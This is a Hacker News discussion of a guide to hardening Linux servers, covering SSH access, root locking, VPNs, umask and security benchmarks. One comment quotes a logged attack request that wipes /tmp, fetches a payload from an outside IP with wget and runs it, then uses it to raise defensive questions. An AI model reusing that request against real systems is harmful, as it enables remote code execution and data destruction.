Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
The Reluctant Sysadmin's Guide to Securing a Linux Server (pboyd.io)
331 points by WallyFunk on July 30, 2023 | hide | past | favorite | 116 comments


There's a reason guides like this are a dime a dozen - there is no way to generalize server configuration this broadly.

But as long as we're doing it anyway - the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

Perhaps one ought not take sysadmin advice from a blog post with a first sentence that reads "I’m not a sysadmin, and I don’t want to be".


The biggest rules about securing things is don't be in security. Just do your diligence to put your hosts several layers away from public access and make all images and containers hardened with no elevated permissions. Sure vulnerabilities will still exist... if the only thing that can access the container is through a narrowed proxy you are not going get some dumb levels of attacks on your systems.

AWS allows you to ssh into your hosts from within AWS. You just manage that security. NO ONE needs public ssh access, no one needs vpn ssh access just AWS ssh access. DON'T OVER COMPLICATE THINGS!

I agree with you. I am not gonna say don't follow a system engineers advice. I say follow everyone's advice but pick out the things that seem most reasonable. If it is extra work then you're doing it wrong, simplify everything so that the time spent on resolving issues is faster. Faster resolution means faster security fixes.


I'm also a "non-sysadmin" like the OP. I'm much more casual than you are:

1. Install LTS server with a sudo admin user and complex password (yes, password, not key. I still end up using keys for backup automation because it's easier.)

2. apt install fail2ban. Don't even need to configure it: its default configuration will auto-ban any IPs trying to brute-force SSH.

3. apt install unattended-upgrades (nowadays installed by default)

I'd like to see anyone hack that.

You mention running containers with no elevated permissions. I've taken a liking to Docker because, in addition to its many benefits, it lets me separate MY processes from those of the OS. It's just so simple when I can identify the server's running services with "docker ps". I'm curious, when was the last time a Docker exploit could escape the container and modify the host? I read it happened in the early days of Docker but is that still a risk? They would need to: a) exploit a bug in a service you're relying on (eg nginx), b) use the former bug to exploit a bug in Docker, c) defeat the Linux kernel's namespace/cgroup isolation. Is that a realistic threat in 2023?


Always a threat if the a host container is on the same HV. You get all sorts of bleed bugs identified every other year. Literally the last one was a few months ago I think. None as large scale as when it first happened.


When you say "no one needs vpn ssh access" vs "AWS ssh access", what is the difference between the two ?


The consoles at big hosts typically require good 2fa to log in to the web management console, which typically can open a command line on the instance. This is a nice authN layer.


Note that it's possible to configure multi-factor authentication using e.g. one-time password (OTP) for those regular openssh logins. The setup to achieve that still seem quite involved though, so the reluctant sysadmin in me haven't got around to try it.

Multiple factors:

1FA: Password(1F) OR private key (password blank)(1F)

2FA: Private key(1F) with password(2F)

MFA: Private key(1F), w/ password(2F) AND OTP(3F)


And have to use their shitty webui?

Ssh has 2fa options if that's the real reason.

Fwiw, this guide also suggests setting up a wg connection which is no better than ssh, and probably worse in some ways.


It doesn't need to be through the web UI, it can be done through the cli.

https://docs.aws.amazon.com/systems-manager/latest/userguide...

Google Cloud has a similar gcloud compute ssh instance-name command, and I imagine there's a similar one on azure.


That's ssh?


There's massive differences of using this compared to throwing some keys on a server and opening 22. These systems use the cloud provider's proxying and authz/authn to dynamically grant access.

One could have a box with no public IP and no open ports and still use this to connect.


Cloud providers proxying?

Via ssh? With an SSH key? Over port 22?


> Via ssh?

No, through their in-house proxy tools such as Session Manager or Identity Aware Proxy or whatever Azure has.

> With an SSH key?

Not at the edge, and not an SSH key you manage. A dynamically generated one managed by the cloud provider which exists just for that session. So, not really, not like you're thinking.

> Over port 22?

For the tunnel? No.


As mentioned you then just need to lock down AWS, rather than AWS AND outside access to servers via VPN. Lessen the attack surface.


The console in AWS allows access within its system. There is no point increasing the access area to the hosts. More surface area the easier it is to be penetrated by ssh vulnerabilities. You also shift fault to AWS rather than your company and team. You did your diligence, you just have to access control and nothing more. IF AWS has a security breach that access to your systems completely on AWS and you can demand compensation.

What you want to do is avoid fault, improve tolerance, but extend liability to the provider.


> AWS allows you to ssh into your hosts from within AWS.

This is where your argument breaks down IMHO. Unless you are saying "don't expose port 22 to the world...", which is a common (small) part of security-in-depth.

> You also shift fault to AWS rather than your company and team. You did your diligence, you just have to access control and nothing more. IF AWS has a security breach that access to your systems completely on AWS and you can demand compensation.

This appears to be an instance of the "appeal to authority"[0] fallacy and is of little solace should server(s) one is responsible for become compromised.

0 - https://en.wikipedia.org/wiki/Argument_from_authority


You still have to do your diligence. You established what is supposed be a secure system yet that system failed due to provider security. AWS is far more staffed than any other company why wouldn't you shift left to AWS? Why would you hire a fleet of security engineers to do what AWS already established? You are breaking convention, reinventing the wheel and complicating an already simple system.

This isn't fallacy it is reducing a businesses cognitive load.


> You still have to do your diligence.

My point exactly.

> You established what is supposed be a secure system yet that system failed due to provider security.

This makes no sense. By your own recommendation, "provider security" is an AWS offering.

> AWS is far more staffed than any other company why wouldn't you shift left to AWS? Why would you hire a fleet of security engineers to do what AWS already established?

What does Amazon's staffing have to do with best practices when securing a server deployed on their platform? Who said anything about "a fleet of security engineers"? How does any of that relate to securing that which one constructs, and ultimately is responsible for, when using said hosting services?

> You are breaking convention, reinventing the wheel and complicating an already simple system.

Are you saying that your original statement of "You also shift fault to AWS rather than your company and team" is somehow an accepted convention?

And what wheel did I "reinvent"?

Finally, was my identification of the common practice which is moving sshd off of port 22 the complication to which you refer?


Yeaaah you're trying poke holes. Problem is that there are larger holes in a network if you're setting up and safe guarding a VPN so you can SSH. Moving ssh if even needed at all should be to the provider's secured tools.

https://aws.amazon.com/blogs/compute/new-using-amazon-ec2-in...

I really don't recommend extending responsibility for creature comforts. However you want to do this so be it.

> This makes no sense. By your own recommendation, "provider security" is an AWS offering.

Are you stating your system is infaliable? So why would you want to bear the infaliable claim and not shift it to the company providing it?

> What does Amazon's staffing have to do with best practices when securing a server deployed on their platform? Who said anything about "a fleet of security engineers"? How does any of that relate to securing that which one constructs, and ultimately is responsible for, when using said hosting services?

Tooling takes a team to support it. You think every company can afford a team to manage that tooling? And why should they? Not all businesses are tech companies but still need a digital footprint. They need to be selfconcious and choose provider practices to get the most out of them.

> Are you saying that your original statement of "You also shift fault to AWS rather than your company and team" is somehow an accepted convention? Providers own the responsibility of their technology. In terms of failure if access is correctly configured and managed, yet their technology fails they owe your businesses it is very simple.

> And what wheel did I "reinvent"?

Implementing old security practices. Why wouldn't you move to be better pratices and prevent larger holes in your network? Often companies get into this repetitious cycle of reimplementation or reinvention of existing tools and technology just to manage access especially ssh. The convention of using a cloud platform is to use a cloud platform's security access not some sketched up VPN and SSH system.


This sums it up, "The convention of using a cloud platform is to use a cloud platform".

If you rent compute space, then you trust them to responsibly use the hypervisor instead of snooping. If you trust that or not, you are all in and may as well cement over the external port 22.


10000% on the money.


> Yeaaah you're trying poke holes.

No, I am trying to remind you of the topic which was under discussion. To wit:

  The Reluctant Sysadmin's Guide to Securing a Linux Server
> Are you stating your system is infaliable?

  A straw man fallacy (sometimes written as strawman) is the
  informal fallacy of refuting an argument different from
  the one actually under discussion, while not recognizing or
  acknowledging the distinction.[0]
> Tooling takes a team to support it.

See above quote.

> You think ...

You do not know what I think nor my experiences, so please do not be so arrogant as to assume so.

>> And what wheel did I "reinvent"?

> Implementing old security practices.

Again, please refer to the *article under discussion*. In the event it remains unclear, I will restate its title:

  The Reluctant Sysadmin's Guide to Securing a Linux Server
> Why wouldn't you move to be better pratices and prevent larger holes in your network?

See previous strawman definition and link below.

> Often companies get into this repetitious cycle of reimplementation or reinvention of existing tools and technology just to manage access especially ssh. The convention of using a cloud platform is to use a cloud platform's security access not some sketched up VPN and SSH system.

Again, see previous strawman definition above and link below.

Note that the only ssh-related recommendation I proffered was:

  Unless you are saying "don't expose port 22 to
  the world...", which is a common (small) part of
  security-in-depth.
This is a well-known, albeit very small and insufficient by itself, part of helping to reduce attack vectors.

As to "sketched up VPN and SSH system", I have no idea as to what you are referencing. Perhaps this is a recollection of a previous engagement wherein decisions made remind you of a bad situation similar to, but different than, this?

HTH

0 - https://en.wikipedia.org/wiki/Straw_man

EDIT: corrected spelling from "waas" to "was"


Strawman argument sometimes is used to draw out a point. You can not confidently say your security solution is infabiable and nor should you. The article is just a good runbook of things and less a guide. But if you are working on the cloud you shouldn't go using old management methods like they belong in your network.

You would not believe how many companies are dependent on patching through users through VPNs in order to access remote hosts. I mean some have to because of no other solutions like managing their own on-prem. I kind of would be interested in AWS access management capable of being implemented within an on-prem.


McDonalds employs the most cooks. They must have the best food.

Staffing count doesn't guarantee quality.


> Perhaps one ought not take sysadmin advice from a blog post with a first sentence that reads "I’m not a sysadmin, and I don’t want to be".

That's just perfect.


That sounds reasonable, from a "passion" angle.

However, I would like to hear what someone who dislikes sysadmining but must anyway has to say. Why? A different perspective. I know some sysadmins who "left the car up on blocks," as in, they couldn't stop tweaking and fixing and so on, and they love that, and that's great.

Someone who is forced into the job, however, is communicating to me what I would expect to be the most necessary tasks. Maybe I also am in a similar place and would like to get on with the rest of my job. And in an Agile world, programmers get pushed into sysadmining ... at least, in some versions of Agile to which I have been subjected.


> However, I would like to hear what someone who dislikes sysadmining but must anyway has to say. ... Someone who is forced into the job ...

The only way a job is done consistently well is by those whom want to do that job well consistently.

HTH

EDIT: added missing "do" verb.


Too bad.

Sometimes a business can't or won't hire a real sysadmin. The people forced into the job need guides just as much.


> Too bad.

> Sometimes a business can't or won't hire a real sysadmin. The people forced into the job need guides just as much.

I was making a more general statement regarding people having to do tasks they don't want to do, even if they have the skills to do them. Which makes resources helpful to "people forced into the job" rather difficult to produce.

How can one make a guide to assist people to be successful in something they don't want to do in the first place?


> the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

That's not a unique or novel insight. For the case your system gets borked (either by yourself, your hardware or your cloud provider) you need a plan in advance:

1. How can I access the data the server has or how much of it can I afford to lose?

2. How do I get a replacement running within a time window acceptable for my usage?

The answers will be very different depending on your use case. But how you locked the root user has very little impact on them.

Booting into another environment is always one option in my plan so locking the root user doesn't frighten me.


"the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment."

As a dev, I say that's a good thing. I've administered my own systems for decades and helped in small startups where we had no full time admin so definitely not new to administering Linux.


> the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

As opposed to borking the root user and being equally locked out? Assuming your sudo config is a "configure it once and then leave it forever" deal - which seems common IME - I can't see any way it would be different.

(Mind, this cuts both ways - once you force only key-based SSH, I generally don't see a problem with direct root access either.)


Just don't set root:toor and you'll be alright. Keys are good, but passwords are good as well.


You shouldn’t need root, you should have another person with admin rights as a backup plan.

It is a vm so if you do something that would break sudo or all your users you should have a vm snapshot at your fingertips ready to restore from AWS interface.

Even if you are running bare metal you should setup snapshots first but nowadays no one runs bare metal web servers it is still som hyper visor with bunch of vm-s that are easy to backup restore or just delete and create fresh.


> You shouldn’t need root, you should have another person with admin rights as a backup plan.

What?

I am the only admin on about a dozen machines. I'm not outsourcing that to a friend. That trust model is much more flawed than separation of duties and permissions segmentation as part of my administration routine.


What happens if you get hit by a bus, or become otherwise incapacitated?


That's what a dead man's switch is for. All of my credentials will be shared after a specified period of time.


Your manager or company owner should have admin account then, he should not use it for anything besides disaster recovery.

If you are single person shop that is your choice, have a root account or whatever you feel like having.


That's not true. It's not obvious what user you have that could do sudo. Thus it does improve security. I advice the same in my book (Deployment from Scratch) and I suggest that for both the host system and containers. There is little cost to not primarily using root.


>> But as long as we're doing it anyway - the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

> That's not true. It's not obvious what user you have that could do sudo. Thus it does improve security. I advice the same in my book (Deployment from Scratch) and I suggest that for both the host system and containers. There is little cost to not primarily using root.

It is true. To ensure root cannot be used when ssh'ing into a server, set "PermitRootLogin" to "no" in sshd_config (as mentioned in the OP).

Locking out root entirely, as further mentioned in the OP and suggested by your comment, does nothing to increase security regarding remote penetration attacks. Furthermore, should a non-root account which has sudo privileges be compromised, an argument could be made that having a functional root account with its own password accessible only locally and not enabling sudo is a more secure approach.

Either way, having a root account which can only be used locally ensures there is a recovery workflow should one be needed, as the GP enumerates.


I would instead suggest the official guide; the Securing Debian Manual <https://www.debian.org/doc/manuals/securing-debian-manual/>


Please note that this official guide is more than 6 years old. It means a large parts of its content is obsolete.

For instance the chapter on web servers is far from today's best practices. It only mentions Apache http (nowadays Nginx is much more widespread), gives an advice about a default configuration which is no more default, and mentions a path that has changed in recent Debian installs. Even considering its age, the quality of this chapter is dubious: it forgets important points, like disabling .htaccess and directory listing, removing unused modules...

Modern tools are obviously missing from this guide: apparmor (though it was in use in 2017), nftables, systemd (unit settings that prevent /home access, prevent privilege escalation, etc)...


I read a bit more of this "official guide", and I'm surprised Debian hasn't deprecated it. Parts are still valuable today, but others are meaningless, and a few should be avoided.

From the changelog, the document had one minor update in 2017 and one in 2013. It was mostly written in 2001-2007. Much has changed over the last 15 years.


It might be a bit corporate now but a few years back I found the security aspects of the redhat admin training to be decent enough for most folk.


The article was explicitly targeted at “Debian 11 (Bullseye) or Ubuntu”.


It's weird to begin such an exercise without stating what the point of "the server" is supposed to be. Is it a ... web server? Interactive unix logins for developers? Mail relay? What does it do? This is the key point of the analysis because "securing" a server consists in making it incapable of doing anything not in the set of things it is meant to do. Notably, starting from this side of the problem can lead you away from "standard machine image". Starting with a kitchen-sink Linux distro like Ubuntu is not the road to hardness.


It's really not weird, that's not how security works.

What the application is doing is relevant to application security, but the whole point of securing the OS is to eliminate the necessity for "trusting" the application.

When you are securing an operating system, you must assume the application that is exposed to the operating environment (be that the internet, local LAN, even simply user logged into the workstation in the case of a GUI or CLI app) is compromised.

The primary goal of most security measures is preventing and detecting privilege escalation and lateral movement within the OS or network.

There are a lot of best practices that apply in general to securing an operating system. If you want to dig deeper, one of the best resources for this information is provided by CIS (Center for Internet Security).

CIS has hardening standards for most OS's yes even including Ubuntu. https://www.cisecurity.org/benchmark/ubuntu_linux

These are standards that many security conscious organizations apply to their servers. The US government takes it a step further with DISA's STIGs.

DISA STIG's are similar to CIS's benchmarks, but result in an even more locked down environment and place extreme restrictions on which crypto libraries are allowed to be used.

In short, securing the OS is a standard best practice that all organizations should be doing. Unfortunately most startups lack engineers with the expertise in building custom linux images so a lot of folks are quite unfamiliar with hardening procedures.

You should absolutely NOT use a non-standard OS because you think it will be more secure. It's a much better idea to use known industry standard security benchmarks on supported Linux distributions than trying to bake your own standard some non Debian/RHEL based bistro.


IME the checklists and guides can be a useful resource but are mostly “cover your a$$” documentation, often time falling into cargo cult suggestions just to add more check-boxes.


You must be using the wrong 'checklists' (they aren't checklists, they are implementation guidelines). CIS benchmarks and DISA STIGs provide concrete actions that lead to a more secure system. Sure some of them might not apply specifically to your environment, but in general they are an excellent starting point.

Some of the line items can be a bit arcane or not as relevant in cloud environments, etc... but that's a far cry from calling them CYA.

Nothing cargo cult about enabling SE Linux, restricting access with IP tables, configuring AuditD and AIDE.


> Nothing cargo cult about enabling SE Linux, restricting access with IP tables, configuring AuditD and AIDE.

These are great ways to massively overcomplicate your system. Generally speaking, having encountered these tools, do not use them unless you're willing to dedicate about 2x the time you would otherwise spend administering the system.


Just because you had difficulty does not mean you should give such advice to others. There is nothing difficult about configuring any of these systems if you know what you are doing.


Time consuming & tedious & error-prone != difficult.


I'm still not sure on how disabling the crypto algorithms that the NSA prefers to not break helps us stay more secure...


If a single line item that seems irrelevant to you makes you think the whole process of security hardening is useless, you are a fool.

Frankly you sound like the tired BOFH trope, if you don't see the benefits of security hardening I hope you are never responsible for anything important infrastructure wise in your organization.


The second sentence

> But I write software for the web

I'm going to guess it's a web server but it's just a guess.


2nd and 3rd sentence

“ But I write software for the web, which means I’m never far from a server, and sometimes I’m the only one around.

So even if I didn’t want the job, I have it, and I need to take the security of these hosts seriously.”

Basic Linux server hardening is not a bad idea or skill to learn. Learning the basics manually help feed into understanding and using higher level solutions.


100%

As long as you are using Debian, RHEL, Ubuntu, or CentOS implementing a basic minimum security baseline is as simple as following the CIS or DISA STIG guides for your OS.

There are plenty of scripts on GitHub that do this (AUDIT THEM FIRST), or you can even just use premade images from CIS in the cloud provider of your choice.


Almost every server sits on the internet and has one or two (sometimes a couple more) ports open listening for their apps internet traffic.

What the traffic is seems irrelevant to 99.99% of servers out there, imo. Yes there's some questions of what deployments look like and what capabilities operators have but those are details outside the general concern of being safely online. IMO.


> Almost every server sits on the internet ...

Nope. Not by a long shot.

> What the traffic is seems irrelevant to 99.99% of servers out there, imo. Yes there's some questions of what deployments look like and what capabilities operators have but those are details outside the general concern of being safely online. IMO.

The following vulnerabilities listing just for the week of 2023-07-17 prove otherwise:

https://www.cisa.gov/news-events/bulletins/sb23-205


> Almost every server sits on the internet

I'm going to counter that the overwhelming majority of hosts in existence do not, in fact, "sit on the internet".


Ideally the traffic would be siphoned thru a load balancer/reverse proxy of some kind rather than the dest service endpoint/port being directly exposed to the internet


Sure. But everyone else here was talking about servers. Which, you know,... serve. Are in some way on the internet.


Host/Servers are in the above case the same thing. And servers can "serve" also on local lan, no internet required


I actually disagree with most of this. I think that, for servers, it's best to stay as close to the "cattle, not pets" model as reasonably possible. Servers should be set up and maintained with automated tooling and rarely connected to manually, preferably only to debug issues. Most of the things in here are gimmicky one-offs that don't meaningfully increase security.

Don't bother setting up a user account, use a public key authorized SSH session as root to do everything. Setting up UFW to block everything but what you should be serving is good. I don't see much point in things like Wireguard or this umask thing.


What should one do when that is not possible to handle the servers as cattle, because there is 200 unique servers which different people has to connect to and do different things with, like a university or other academic places?


Sibling is snarky but correct.

I don't think your situation has anything to do with what I described. It may still be linux, but it strikes me like saying that the maintenance manual is different between a sports car and a dump truck. Well yeah, obviously.

Bad though I think the original article might be, it would be 10x worse to attempt to write the reluctant sysadmin's guide to triple-digit workstation clusters in a university environment. Nothing about best practices for production web servers will apply for that, you need to hire an actual sysadmin.


Hire sysadmins


> If you’re on Windows, PuTTYgen should work

If you're on Windows you can `wsl --install` and work with Linux (eg Ubuntu 2204).

You can also install Git Bash which comes with ssh and ssh-keygen.

Either way , same instructions.


And on up-to-date versions, OpenSSH client and tools are available from powershell or cmd.


You can also install the Microsoft port of OpenSSH on older versions yourself.


> GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.231/jaws;sh+/tmp/jaws

in the case of a successful attack, some questions to ask could be:

- why did they manage to use wget?

- why {apache,nginx,postfix,exim,sendmail,...} is allowed to use wget, or curl, or nc or bash (or ...)?

- why is wget, curl, nc, telnet, .. installed on the server? can they be uninstalled? with (!!) if it's a container.

- why did they manage to execute files from /tmp, or /var/tmp, or /dev/shm? do these directories need write access for "others" or can they be mounted with "noexec"?

- ufw/iptables/nftables won't stop local binaries from opening outbound connections, how would you stop outbound connections by binary, path, etc?

- if they managed to wipe the logs, how could you have known all the commands they executed? could auditd+grafana (just an example) have helped here by sending logs to a remote server?


I agree with your questions to be asked if an attack succeeds but...

> ufw/iptables/nftables won't stop local binaries from opening outbound connections

Wait... Of course iptables/nftables can be used to prevent anything local from opening outbound connections. You can, say, easily have a firewall which only allows "NEW" traffic to be inbound traffic on either port 22 or 443.

They're called stateful firewalls for a reason.

For example on Debian you could configure the firewall so that the only user allowed to emit new traffic to get updates is the (/nonexistent:/user/sbin/nologin) user "_apt".

And for all those (not you) talking about the "cattle vs pet" thing, all this can be automated by hardening scripts you run exactly once, once you set up the server.

It's not because there are guides out there that every step in these guides have to be done manually, each time you configure a new server.


I’m a biologist and also a reluctant sysadmin. I’m happy to see I do roughly the same [0] except that I use an ed25519 ssh key and switched to Tailscale (it’s just too easy). I only open “unsafe” ports on the tailnet.

I did just install my first NixOS system so I’m indeed heading towards full automation.

[0] https://blog.hmrt.nl/posts/first_steps_arch_box/


Tailscale is so good. One of the best pieces of software I've used in a long time. It just works, and it's really good at what it does (VPNs into your private network, regardless of the route to it)


I use Wireguard and do not rely on a third party.


Wireguard is cool, Tailscale is based on Wireguard.

But Tailscale is just a 3 sec process for any new server, 0 config needed, no holes in the firewall, nothing.

But I get the argument.


The first rule of sysadmin: Have a regular schedule for testing your offsite backups of all your systems.

After that, as others have noted, create and review a threat model and use that to guide your hardening based on official guides:

https://www.debian.org/doc/manuals/securing-debian-manual/

and here's a readable introduction to the NIST STIGs:

https://cybergladius.com/nist-server-hardening-best-practice...


Reluctant sysadmin: story of my life.

Over the last 3 years I have gone from being a timid junior web dev to reluctantly and hastily having to be the guy managing the Linux web servers and keeping the operation running and being hardened along the way.

On the one hand, the huge salary increase has been nice but on the other hand I am constantly thinking one day I'm gonna fuck it all up. I feel like I'm not doing this job any justice and that I'm way out of my element all the time.

I try to get better by reading blog posts like this and documentation and asking for advice but I just feel like an impostor all the time.

But employers are happy with the results and I guess that makes it tolerable.

So thanks for these types of guides!


Sysadmin isn't a profession you choose, it's something that happens to your life.


Except I choose it, then moved on later in life ;-)


Also configure fail2ban and enable it for ssh.

https://www.digitalocean.com/community/tutorials/how-to-prot...


I have a few things I disagree with in here and I haven't even gotten all the way through. Generally, most of this is unnecessary, some of it is even ill-advised. The best thing you can do is enable automated updates, and rely on your cloud provider's console for accessing the server and disabling all remote access otherwise. If you do this, you remove a significant amount of vectors of attack. Within AWS there are very good security controls you can put into place, on more generic VPS providers, at minimum you should start by running a firewall that only allows incoming and outgoing traffic on specified ports, and logging in only via key-based auth + 2FA (you can use Google Auth, Yubikey, or others to do this via PAM modules) if you must use SSH. Most of the security issues I've encountered in my career have been in the application, and then are used to provide a pathway to do further privilege escalation. If you work to sandbox your applications, such as using hardened minimal containers w/ appropriate namespacing & sVirt, this mitigates most concerns here.

It's been trivially easy to prevent bots spamming basic SSH and HTTP attacks to every IPv4 address for a very long time.


Your comment sounds convincing at the start but..

"The best thing you can do is enable automated updates, and rely on your cloud provider's console for accessing the server and disabling all remote access otherwise."

1) I've run into to many issues letting the systems auto update. 2) Several times the AWS console (a web app so probably not as secure as a remote Linux ssh connection in my mind) failed to work, not just for me either, there have been multiple report I found on this, my remote ssh connection is the only way I could fix it since AWS doesn't have a remote serial console thing like Linode has (or had?).


> since AWS doesn't have a remote serial console thing

https://aws.amazon.com/about-aws/whats-new/2021/03/introduci...


You're right, I forgot EC2 got that. When Lightsail gets it, I'll consider AWS as having it.


securing from what? this thing is pointless mid-90ies advise without a threat-model.


This guy gets it. Your first question should be around your threat model. Are you protecting against random scans and script kiddies or the various APTs?

Maybe then look at the MITRE ATT&CK framework, Cyber Kill Chain etc.

I really hate to suggest them as it appears they have deviated in weirds ways from their original goal of protecting critical infrastructure from cybersecurity attacks, but CISA has many relevant documents.


Meh, just do it like me get hardened image and container. Deploy stuff as a gold image without elevated permissions and or container. Then just make sure everything is behind a proxy or intelligent load balancer that restricts any crazy input.

DONT OVERCOMPLICATE WORK

Overcomplicating work means slower response times to solving problems.


Can you give examples of hardened images?


If you are training an HN parody LLM, this is a perfect discussion to add to your training set, featuring all the canonical archetypes—including my comment among them.

The headline and post read like top shelf parody too, as if synthetically generated to summon we archetypes.


I like the changing of the default umask, although it probably shouldn't be 077.

Is acl needed over, say, chown?


No, there's no need to use `setfacl` over `chown/chmod` in the author's example.

The reason that the author uses umask 077 and ACLs is, I think, just a mindset. By using 077, the file is restricted to only the owner, and the sysadmin does not need to think about group memberships. By extending read access using an ACL, this theme is continued; additional usernames will be appended as ACLs, but no group set of usernames needs to exist.

A file named "alfred" would, presumably, only ever needed to be read by root and alfred, but that's just the narrow case for the author's scheme.


If not 077 then what?


077 is a bit too restrictive for a lot of workloads. 027 is recommended by CIS for servers and 022 for desktop.

If you are sure you can use 077 without stuff breaking, awesome, but that's not always the case. Typically on systems using 077 you will find yourself using chmod a lot.


Why not 077?


It effectively makes group ownership meaningless.

027 does a better job of keeping the model while tightening it up - worldly permissions are removed, users and groups are still meaningful.

This is what they're supplementing with ACLs, creating a frustrating problem of discovery by managing groups of users outside of groups

It's not necessarily wrong, I guess. There may be cases where someone wants this. ACLs are an answer, just not the one I'd suggest.

Why? Imagine 'Bob' leaves. Do you want to remove them from countless ACLs, or one group?

One is probably better off with 027, using groups, and focusing on SELinux or AppArmor. It will permit or deny things based on many things, including user context.

Bonus: it isn't limited to assets on disk. Things like gaining a shell and proxying services can be denied.


This was an informative article with an opinionated take. Don’t update the original based on feedback. It is your article on your blog. You do you.


I’d learn to run OpenSCAP with CIS and the NIST CSF to get an idea of secure operations. The former can detect and remediate a lot of the issues these types of guides are discussing.

But really the idea of being successful at anything while also having no knowledge of it is kind of a farcical contradiction.

It’s like saying, look, I just want to build a rocket engine. Tell me how without all the physics mumbo jumbo.


Everyone is parroting the same thing over and over again, but no one is going into the whys. Why do this, what's the benefit, how will it thwart this or that type of attack. New books on the subject tend to collect these guides, distill them a bit, and parrot it all over again.


This notion of security is stale. Real security is far more complex than this, requiring automated provisioning and logging. This is more suitable for a VPS or a personal VM than anything professional. Also installing acl just to use setfacl bothered me.


Is there a guide to teach these reluctant sysadmins how to evaluate, plan, and choose between all these different methods ?

For me, I find the hardest part of securing systems are usually to decide what is good enough for the current situation.


> We want a umask of 077,

No we don't. This creates problems with many packages. There's a reason for defaults and a reason not to follow cargo-culting security "recipes".


trying my best to understand the target audience for this blog post. It feels like most of these things fall somewhere in between "a sysadmin should know this" and "this might be new to a dev without much ops experience". And then, my first thought is, well if you're focused on getting software out the door your best bet is not to touch any of this stuff and deploy on a platform where configuring the Linux distro is not your responsibility. i.e. k8s or AWS ECS


WireGuard is fine, but since it's only UDP, it doesn't work well if you're connecting behind a restrictive firewall or from a network using CGNAT (many of them).

If you're a reluctant sysadmin that doesn't care, I'd recommend using Tailscale. It's wireguard without the drama, is extremely competent at piercing through almost any firewall [0], and has a great ACL system that lets you fine tune which accounts can access what.

It's also free (for now)!

[0] https://tailscale.com/blog/how-nat-traversal-works/


I don't get why a wireguard vpn to connect to ssh would be any better than just ssh directly (assuming reasonable ssh config)


You can put SSH on a different port but it can still be found through port scanning and poked at. Figuring out whether Wireguard is running at all or which port it's on is, from my understanding, very much not a trivial task if possible at all from the outside. This extra layer prevents attackers from even getting a chance at poking around with SSH.


It's definitely neat to know how these things work on a Linux server, but most of this advice doesn't make sense for an EC2 instance. You should be using security groups instead of UFW (indeed the article mentions this). You don't need to configure SSH access because SSM session manager exists, which also makes the WireGuard setup superfluous, too.


> You should not log in directly as root.

Why not?


I see this as mostly a way to prevent fat finger mistakes on the part of the sysadmin. Most of the tasks that need to be done when interactively logging in don't really require root per se. Why give yourself so much ambient permissions then? If I accidentally issue a command that only root can execute, it is a chance to reflect when repeating the command with sudo and typing the password.


No Fail2ban?


Too many attack surface vectors (from within the Linux/glibc/bash)?


Run lynis and linpeas!!!

Also, setup auditd and rsyslog forwarding. Backup anything important.


Wouldn't it be easier to use OpenBSD?


OpenBSD don't even have security advisories like most other distros have. [1]

So I'd argue it's impossible to build a correct threat model if all your vulnerabilities are expressed on code-level, rather than on "what software" or "what packages" are affected by it.

[1] https://www.openbsd.org/errata73.html


Nice try.


No mention of SSH certificates?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: